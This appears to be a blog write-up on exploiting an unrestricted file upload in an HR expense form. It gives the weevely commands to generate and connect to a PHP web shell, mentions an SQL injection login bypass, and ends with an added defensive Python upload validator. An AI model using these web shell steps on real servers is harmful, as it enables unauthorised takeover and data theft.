
Weevely

Guide to upload weevely shell to exploit unrestricted file upload

  
Vulnerability: Unrestricted file upload

Description: The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.

Impact: The impact of this vulnerability is high, since code can be executed in the server context or on the client side.

OWASP test ID: OTG-CONFIG-003

Straight to the write-up: the web application had lots of vulnerabilities, like authentication bypass via SQL injection. The login panel was vulnerable to SQLi. After gaining access to a lot of sensitive information, I reported the vulnerability and they patched the login panel, but I was able to gain access once again via their Human Resource Management System (hrm.vulnerableurl.com).

After closely going through all of the sections, like employee details, leave management and the salary section, there was one file upload feature in the add expense tab. I quickly checked for unrestricted file upload, and it straightforwardly allowed me to upload a PHP file without any bypass. So I created a shell with the weevely command. Now, what is weevely?

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. It allows you to dump the database, mount the web server to the local system, and has a lot more features. Below are the steps to create the shell.

$ weevely generate p4ssw0rd sh3llfile.php
Generated 'sh3llfile.php' with password 'p4ssw0rd' of 677 byte size.

Upload the file and to access the remote shell type...
$ weevely https://hrm.vulnerableurl.com/sh3llfile.php p4ssw0rd

If it gives you a successful prompt of the webroot, then you've successfully backconnected with the shell.

[Image: Fileupload] The vulnerable file upload functionality, which allowed the PHP shell to be uploaded.

[Image: Filepath] The file path of the shell after uploading it to the server; it successfully gave a backconnection to our listener on localhost. The vulnerable server was HostGator.
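The check that was missing from the add expense upload, sketched as an added example (not code from the original post or from the affected application). It assumes receipts may only be PDF, PNG or JPEG and that `storage_dir` lies outside the web root; all names here are hypothetical.

```python
import secrets
from pathlib import Path

# Assumed policy for expense receipts: extension -> required leading bytes.
ALLOWED = {
    "pdf": b"%PDF-",
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
MAX_BYTES = 5 * 1024 * 1024  # assumed size limit


class UploadRejected(ValueError):
    """Raised when an upload fails the policy."""


def stored_name_for(client_name: str, data: bytes) -> str:
    """Return a server-generated name for an accepted upload, or raise."""
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("size not allowed")
    # Only the text after the last dot is kept; paths and extra extensions
    # in the client-supplied name are discarded.
    _, dot, ext = client_name.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED:
        raise UploadRejected("extension not allowed")
    # Check the bytes themselves, not the Content-Type header the client sent.
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # Random name: the uploader cannot choose or predict the stored path.
    return f"{secrets.token_hex(16)}.{ext}"


def save_upload(client_name: str, data: bytes, storage_dir: str) -> Path:
    """Validate, then write into storage_dir (assumed outside the web root)."""
    path = Path(storage_dir) / stored_name_for(client_name, data)
    with open(path, "xb") as fh:  # "x": never overwrite an existing file
        fh.write(data)
    return path


if __name__ == "__main__":
    # Constructed sample inputs, not captured from the real application.
    samples = [("sh3llfile.php", b"<?php /* placeholder */ ?>"),
               ("receipt.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)]
    for name, body in samples:
        try:
            print(name, "->", stored_name_for(name, body))
        except UploadRejected as err:
            print(name, "rejected:", err)
```

Magic-byte checks do not stop a file that is both a valid image and contains script text, so the storage location must not be served through the PHP handler; the random name and out-of-webroot directory cover that case.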

This post is licensed under CC BY 4.0 by the author.